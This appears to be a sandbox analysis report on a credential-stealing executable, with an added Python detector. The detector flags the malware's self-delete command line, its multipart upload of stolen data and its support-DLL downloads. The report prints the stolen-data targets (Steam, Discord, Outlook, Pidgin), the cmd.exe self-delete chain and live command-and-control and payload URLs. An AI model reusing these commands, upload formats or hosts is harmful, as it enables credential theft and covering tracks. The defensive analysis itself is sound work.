Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: 00000002
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: 00000003
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: 00000004
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Pidgin
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: \.purple\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: accounts.xml
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: token:
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Software\Valve\Steam
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: SteamPath
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: \config\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: ssfn*
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: config.vdf
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: DialogConfig.vdf
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: libraryfolders.vdf
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: loginusers.vdf
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: \Steam\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: sqlite3.dll
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: done
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: soft
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: \Discord\tokens.txt
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: https
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: POST
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: HTTP/1.1
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: hwid
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: build
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: token
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: file_name
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: file
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: message
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6C4BA9A0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B4440 PK11_PrivDecrypt,2_2_6C4B4440
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C484420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6C484420
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B44C0 PK11_PubEncrypt,2_2_6C4B44C0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C5025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6C5025B0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6C4BA650
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C498670 PK11_ExportEncryptedPrivKeyInfo,2_2_6C498670
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C49E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6C49E6E0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6C4DA730
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6C4E0180
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B43B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6C4B43B0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6C4D7C00
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C497D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6C497D60
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6C4DBD30
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6C4D9EC0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B3FF0 PK11_PrivDecryptPKCS1,2_2_6C4B3FF0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,2_2_6C4B9840
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6C4B3850
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4DDA40 SEC_PKCS7ContentIsEncrypted,2_2_6C4DDA40
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C4B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6C4B3560
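
The decrypted strings above give away two behaviours that are cheap to detect on the endpoint and on the wire: the self-delete chain (cmd.exe /c timeout /t 5 & del /f /q "<dropped exe>" & del "C:\ProgramData\*.dll" & exit) and the upload format (an HTTP POST, multipart/form-data, with parts named hwid, build, token, file_name, file and message). The Networking section of this report adds a third: the NSS/SQLite/CRT support DLLs are fetched over plain HTTP from an IP-literal host under a 16-hex-digit directory. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of any tool the report names. The process-creation events and HTTP records it scans are constructed sample input, their field names (image, cmdline, method, url, content_type, body) are an assumption to be mapped onto real telemetry, and the 16-hex-digit directory check is a heuristic taken from this sample's URLs, not a property of every build.

```python
import re

# --- 1. Self-delete chain -----------------------------------------------------
# From the decrypted strings: cmd.exe /c timeout /t 5 & del /f /q "<dropped exe>" & del "C:\ProgramData\*.dll" & exit
SELF_DELETE_RE = re.compile(r'timeout\s+/t\s+\d+\s*&\s*del\s+/f\s+/q\s+"[^"]+"', re.IGNORECASE)
PROGRAMDATA_DLL_WIPE_RE = re.compile(r'del\s+"C:\\ProgramData\\\*\.dll"', re.IGNORECASE)


def is_self_delete_cmdline(cmdline: str) -> bool:
    """True for a cmd.exe command line that waits and then force-deletes a quoted file."""
    return bool(SELF_DELETE_RE.search(cmdline))


# --- 2. Exfiltration upload ---------------------------------------------------
# From the decrypted strings: POST, multipart/form-data, parts hwid/build/token/file_name/file/message.
EXFIL_FIELDS = {"hwid", "build", "token", "file_name", "file", "message"}
FORM_NAME_RE = re.compile(r'Content-Disposition:\s*form-data;\s*name="([^"]+)"', re.IGNORECASE)


def multipart_field_names(body: str) -> set:
    """Lower-cased names of the form-data parts in a multipart body."""
    return {m.group(1).lower() for m in FORM_NAME_RE.finditer(body)}


def is_stealer_exfil(method: str, content_type: str, body: str, min_fields: int = 3) -> bool:
    """A multipart POST carrying at least min_fields of the stealer's part names."""
    if method.upper() != "POST" or "multipart/form-data" not in content_type.lower():
        return False
    return len(multipart_field_names(body) & EXFIL_FIELDS) >= min_fields


# --- 3. Support-DLL download --------------------------------------------------
# From the Networking section: http://<ip>/68b591d6548ec281/{freebl3,mozglue,nss3,softokn3,sqlite3,msvcp140,vcruntime140}.dll
# The 16-hex-digit directory is what this sample used; treat it as a heuristic (assumption), not a constant.
STEALER_DLLS = {"nss3.dll", "freebl3.dll", "mozglue.dll", "softokn3.dll",
                "sqlite3.dll", "msvcp140.dll", "vcruntime140.dll"}
DLL_FETCH_RE = re.compile(
    r'^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/([0-9a-f]{16})/([A-Za-z0-9_.-]+\.dll)$', re.IGNORECASE)


def is_stealer_dll_fetch(url: str) -> bool:
    """Plain-HTTP fetch of one of the NSS/SQLite/CRT DLLs from an IP-literal host."""
    m = DLL_FETCH_RE.match(url)
    return bool(m) and m.group(3).lower() in STEALER_DLLS


def scan(process_events, http_records) -> list:
    """Run the three checks; returns (tag, detail) tuples in the order the records were seen.

    Record field names (image, cmdline, method, url, content_type, body) are an
    assumption of this example; map them from your own telemetry.
    """
    findings = []
    for ev in process_events:
        if is_self_delete_cmdline(ev["cmdline"]):
            wipe = PROGRAMDATA_DLL_WIPE_RE.search(ev["cmdline"]) is not None
            findings.append(("self_delete+programdata_dll_wipe" if wipe else "self_delete", ev["cmdline"]))
    for rec in http_records:
        if is_stealer_dll_fetch(rec["url"]):
            findings.append(("stealer_dll_fetch", rec["url"]))
        if is_stealer_exfil(rec["method"], rec["content_type"], rec["body"]):
            findings.append(("stealer_exfil", rec["url"]))
    return findings


def _part(name, value, filename=None):
    """Build one multipart part (only used to construct the sample input below)."""
    disp = f'Content-Disposition: form-data; name="{name}"'
    if filename:
        disp += f'; filename="{filename}"'
    return f"------X\r\n{disp}\r\n\r\n{value}\r\n"


# Constructed sample telemetry (not from the report): one malicious and one benign command line,
# one DLL fetch, one upload to the C2 URL the report lists, one ordinary file upload.
SAMPLE_PROCESS_EVENTS = [
    {"image": "C:\\Windows\\system32\\cmd.exe",
     "cmdline": '"C:\\Windows\\system32\\cmd.exe" /c timeout /t 5 & del /f /q '
                '"C:\\Users\\user\\AppData\\Local\\Temp\\DLTDCR8UJINP8YM8Y.exe" & del "C:\\ProgramData\\*.dll" & exit'},
    {"image": "C:\\Windows\\system32\\cmd.exe",
     "cmdline": '"C:\\Windows\\system32\\cmd.exe" /c timeout /t 30 & echo done'},
]
SAMPLE_HTTP_RECORDS = [
    {"method": "GET", "url": "http://185.215.113.206/68b591d6548ec281/nss3.dll", "content_type": "", "body": ""},
    {"method": "POST", "url": "http://185.215.113.206/c4becf79229cb002.php",
     "content_type": "multipart/form-data; boundary=----X",
     "body": _part("hwid", "0123456789ABCDEF") + _part("build", "default") + _part("token", "abc")
             + _part("file_name", "screenshot.jpg") + _part("file", "<jpeg bytes>", "screenshot.jpg") + "------X--\r\n"},
    {"method": "POST", "url": "https://photos.example/upload", "content_type": "multipart/form-data; boundary=----Y",
     "body": _part("avatar", "<png bytes>", "me.png") + "------Y--\r\n"},
]

if __name__ == "__main__":
    for tag, detail in scan(SAMPLE_PROCESS_EVENTS, SAMPLE_HTTP_RECORDS):
        print(f"{tag}: {detail}")
```

Each check is deliberately narrow: the command-line rule keys on the `timeout ... & del /f /q "<quoted path>"` shape rather than on `timeout` alone, the upload rule requires several of the stealer's part names together so a normal avatar upload with a single `file` part does not fire, and the DLL rule requires both an IP-literal host and one of the exact library names the sample downloaded.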

                                      Phishing

Source: Yara match File source: C:\Temp\.gif, type: DROPPED
Source: Yara match File source: C:\Temp\random.hta, type: DROPPED
Source: Yara match File source: C:\Temp\QZ7iCUD92.txt, type: DROPPED
Source: Yara match File source: C:\Temp\8tA3oGhlP.txt, type: DROPPED
Source: Yara match File source: C:\Temp\NLqFjPikt.txt, type: DROPPED
Source: 5EfYBe3nch.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: ntkrnlmp.pdbx, source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: nss3.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: mozglue.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                                      Software Vulnerabilities

Source: C:\Program Files\Google\Chrome\Application\chrome.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exe Memory has grown: Private usage: 18MB later: 41MB

                                      Networking

Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: nearycrepso.shop
Source: Malware configuration extractor URLs: rabidcowse.shop
Source: Malware configuration extractor URLs: cloudewahsj.shop
Source: Malware configuration extractor URLs: wholersorie.shop
Source: Malware configuration extractor URLs: framekgirus.shop
Source: Malware configuration extractor URLs: abruptyopsn.shop
Source: Malware configuration extractor URLs: noisycuttej.shop
Source: Malware configuration extractor URLs: tirepublicerj.shop
Source: Malware configuration extractor URLs: fancywaxxers.shop
Source: Malware configuration extractor IPs: 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View IP Address: 1.1.1.1
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Code function: 2_2_6C46CC60 PR_Recv,2_2_6C46CC60
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/L
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeZ
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exev
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeX
Source: 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exeD
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp String found in binary or memory: http://185.215.113.206
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllNQM
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllnPm
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-S0
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpET
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2294056089.000000000B4FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpY
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpiS
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpmT
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpyD
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp String found in binary or memory: http://185.215.113.206ones
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000014.00000002.2543676458.0000000003165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.comd
Source: powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
